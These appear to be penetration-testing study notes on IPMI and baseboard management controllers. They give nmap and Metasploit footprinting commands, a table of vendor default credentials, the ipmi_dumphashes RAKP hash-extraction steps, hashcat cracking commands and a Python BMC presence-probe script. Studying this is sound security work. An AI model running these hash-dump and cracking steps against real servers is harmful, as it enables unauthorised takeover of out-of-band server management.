- intelligent platform mgmt interface (IPMI) is a set of standardized specs for HW-based host mgmt systems used for system mgmt and monitoring
- acts as an autonomous subsystem that works independently of the host's BIOS, CPU, FW, and underlying OS
- provides the sysadmin with the ability to manage and monitor systems even when they are powered off
- operates using a separate, direct network connection to the system's HW and does not require access to the OS via a login shell
- typically used in three ways:
  - before the OS has booted, to modify BIOS settings
  - when the host is fully powered down
  - to access the host after a system failure
- IPMI requires the following components:
  - baseboard mgmt controller (BMC)
  - intelligent chassis mgmt bus (ICMB)
  - IPMI memory
  - comms interface: typically LAN or serial

## Footprinting IPMI

```bash
sudo nmap -sU --script ipmi-version -p623 <ip_addr>

# also try the ipmi_version scanner within metasploit
msfconsole
msf6> search scanner ipmi
msf6> use auxiliary/scanner/ipmi/ipmi_version
msf6> show options
msf6> set RHOSTS <ip_addr>
msf6> show options
msf6> run
```

## Default Config

| Product         | Username      | Password             |
| --------------- | ------------- | -------------------- |
| Dell iDRAC      | root          | calvin               |
| HP iLO          | Administrator | random 8-char string |
| Supermicro IPMI | ADMIN         | ADMIN                |

```bash
# try the ipmi_dumphashes scanner within metasploit
# this module obtains a password hash for ANY valid user account on the BMC by exploiting a flaw in the RAKP protocol used with IPMI 2.0
msfconsole
msf6> search scanner ipmi_dumphashes
msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6> show options
msf6> set RHOSTS <ip_addr>
msf6> show options
msf6> run

# crack the exposed hash
hashcat -m 7300 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 7300 -w 3 -O "hash" /usr/share/wordlists/rockyou.txt

# mask attack for when HP iLO still uses its factory default password (8 chars, digits + uppercase)
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
```
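The nmap and metasploit checks above both start from the fact that a BMC answers session-less RMCP traffic on UDP/623. As an added example (not from the original notes), the script below builds the RMCP/ASF Presence Ping, parses the Presence Pong, and reports whether the responder advertises IPMI support, which is useful for auditing which hosts on a management LAN expose a BMC at all. The packet layout follows the RMCP/ASF format as used by IPMI 2.0; the sample pong is constructed, not captured.

```python
import socket
import struct

# RMCP header: version 0x06, reserved, sequence 0xFF (no ACK wanted), class 0x06 = ASF.
# ASF Presence Ping body: IANA enterprise number 4542, type 0x80, tag, reserved, data length 0.
ASF_IANA = 4542
PING_TYPE, PONG_TYPE = 0x80, 0x40
IPMI_PORT = 623

def build_presence_ping(tag: int = 0) -> bytes:
    """Build the 12-byte RMCP/ASF Presence Ping datagram sent to UDP/623."""
    rmcp = struct.pack("!BBBB", 0x06, 0x00, 0xFF, 0x06)
    asf = struct.pack("!IBBBB", ASF_IANA, PING_TYPE, tag & 0xFF, 0x00, 0x00)
    return rmcp + asf

def parse_presence_pong(data: bytes) -> dict:
    """Parse a 28-byte ASF Presence Pong; bit 7 of 'supported entities' means IPMI is supported."""
    if len(data) < 28:
        raise ValueError("too short for an ASF presence pong")
    ver, _, _, cls = struct.unpack("!BBBB", data[:4])
    if ver != 0x06 or cls != 0x06:
        raise ValueError("not an RMCP/ASF message")
    iana, mtype, tag, _, dlen = struct.unpack("!IBBBB", data[4:12])
    if iana != ASF_IANA or mtype != PONG_TYPE or dlen != 16:
        raise ValueError("not an ASF presence pong")
    oem_iana, _oem_defined, entities, interactions = struct.unpack("!IIBB", data[12:22])
    return {
        "tag": tag,
        "ipmi_supported": bool(entities & 0x80),
        "asf_version": entities & 0x0F,
        "oem_iana": oem_iana,
        "supported_interactions": interactions,
    }

def probe_bmc(host: str, timeout: float = 2.0):
    """Send one Presence Ping to host:623/udp; return the parsed pong, or None if it stays silent."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_presence_ping(tag=1), (host, IPMI_PORT))
        try:
            data, _ = sock.recvfrom(512)
        except socket.timeout:
            return None
    return parse_presence_pong(data)

# Constructed sample pong (not a real capture): IPMI supported, ASF version 1, tag 1.
SAMPLE_PONG = (bytes([0x06, 0x00, 0xFF, 0x06])
               + struct.pack("!IBBBB", ASF_IANA, PONG_TYPE, 1, 0, 16)
               + struct.pack("!IIBB", ASF_IANA, 0, 0x81, 0x00) + bytes(6))
```

A host that answers the ping with `ipmi_supported` set is one whose BMC credentials and IPMI 2.0 RAKP exposure should be reviewed against the default-config table above.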